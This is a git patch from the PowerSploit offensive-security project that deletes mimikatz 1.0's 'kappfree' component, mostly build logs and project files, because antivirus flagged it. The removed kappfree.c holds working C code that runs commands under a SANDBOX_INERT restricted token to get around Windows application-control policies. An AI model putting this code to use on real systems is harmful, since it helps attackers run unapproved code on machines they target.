From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001 From: mattifestation Date: Mon, 3 Feb 2014 17:13:35 -0500 Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit. --- .../mimikatz-1.0/kappfree/Win32/CL.read.1.tlog | Bin 13668 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/CL.write.1.tlog | Bin 528 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/cl.command.1.tlog | Bin 1190 -> 0 bytes .../Win32/kappfree.dll.intermediate.manifest | 10 -- .../kappfree/Win32/kappfree.lastbuildstate | 2 - .../mimikatz-1.0/kappfree/Win32/kappfree.res | Bin 788 -> 0 bytes .../kappfree/Win32/kappfree.write.1.tlog | 5 - .../kappfree/Win32/link-cvtres.read.1.tlog | 1 - .../kappfree/Win32/link-cvtres.write.1.tlog | 1 - .../kappfree/Win32/link.command.1.tlog | Bin 1510 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/link.read.1.tlog | Bin 2184 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/link.write.1.tlog | Bin 756 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/mt.command.1.tlog | Bin 936 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/mt.read.1.tlog | Bin 1094 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/mt.write.1.tlog | Bin 574 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/rc.command.1.tlog | Bin 628 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/rc.read.1.tlog | Bin 2522 -> 0 bytes .../mimikatz-1.0/kappfree/Win32/rc.write.1.tlog | Bin 354 -> 0 bytes Exfiltration/mimikatz-1.0/kappfree/kappfree.c | 34 ------ Exfiltration/mimikatz-1.0/kappfree/kappfree.h | 9 -- Exfiltration/mimikatz-1.0/kappfree/kappfree.rc | Bin 1912 -> 0 bytes .../mimikatz-1.0/kappfree/kappfree.vcxproj | 119 --------------------- .../mimikatz-1.0/kappfree/kappfree.vcxproj.filters | 12 --- 23 files changed, 193 deletions(-) delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/kappfree.c delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/kappfree.h delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/kappfree.rc delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj delete mode 100644 Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters (limited to 'Exfiltration/mimikatz-1.0/kappfree') diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog deleted file mode 100644 index 574462d..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog deleted file mode 100644 index 1393f52..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog deleted file mode 100644 index 05c99d0..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest deleted file mode 100644 index ecea6f7..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest +++ /dev/null @@ -1,10 +0,0 @@ - - - - - - - - - - diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate deleted file mode 100644 index 4d28193..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -#v4.0:v100 -Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res deleted file mode 100644 index 416efb2..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog deleted file mode 100644 index 352791c..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog +++ /dev/null @@ -1,5 +0,0 @@ -^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\kappfree\kappfree.vcxproj -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog +++ /dev/null @@ -1 +0,0 @@ -ÿþ \ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog +++ /dev/null @@ -1 +0,0 @@ -ÿþ \ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog deleted file mode 100644 index cdc5689..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog deleted file mode 100644 index b97e650..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog deleted file mode 100644 index f8b3fd9..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog deleted file mode 100644 index be34103..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog deleted file mode 100644 index 23f6601..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog deleted file mode 100644 index 53b60f3..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog deleted file mode 100644 index 92ee084..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog deleted file mode 100644 index 6f2e9b0..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog deleted file mode 100644 index c18037c..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.c b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c deleted file mode 100644 index 63130c9..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.c +++ /dev/null @@ -1,34 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "kappfree.h" - -extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow) -{ - HANDLE monToken, monSuperToken; - wchar_t * commandLine; - PROCESS_INFORMATION mesInfosProcess; - STARTUPINFO mesInfosDemarrer; - - if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY /*| TOKEN_IMPERSONATE*/, &monToken)) - { - if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken)) - { - RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION)); - RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO)); - mesInfosDemarrer.cb = sizeof(STARTUPINFO); - - commandLine = _wcsdup(lpszCmdLine); - if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess)) - { - CloseHandle(mesInfosProcess.hThread); - CloseHandle(mesInfosProcess.hProcess); - } - free(commandLine); - CloseHandle(monSuperToken); - } - CloseHandle(monToken); - } -} diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.h b/Exfiltration/mimikatz-1.0/kappfree/kappfree.h deleted file mode 100644 index 22ffbc2..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.h +++ /dev/null @@ -1,9 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include - -extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow); diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc b/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc deleted file mode 100644 index f08bc56..0000000 Binary files a/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc and /dev/null differ diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj deleted file mode 100644 index ef29473..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj +++ /dev/null @@ -1,119 +0,0 @@ - - - - - Release - Win32 - - - Release - x64 - - - - {E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0} - Win32Proj - kappfree - - - - DynamicLibrary - false - true - Unicode - Static - - - DynamicLibrary - false - true - Unicode - Static - - - - - - - - - - - - - false - $(SolutionDir)$(Platform)\ - $(Platform)\ - - - false - $(SolutionDir)$(Platform)\ - $(Platform)\ - - - - Level3 - - - Full - true - true - WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions) - $(SolutionDir)/commun;$(SolutionDir)/modules - Size - true - false - Fast - false - false - None - - - Windows - false - true - true - advapi32.lib;%(AdditionalDependencies) - NoErrorReport - - - - - Level3 - - - Full - true - true - WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions) - $(SolutionDir)/commun;$(SolutionDir)/modules - Size - true - false - Fast - false - false - None - - - Windows - false - true - true - advapi32.lib;%(AdditionalDependencies) - NoErrorReport - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters deleted file mode 100644 index 987362e..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters +++ /dev/null @@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file -- cgit v1.2.3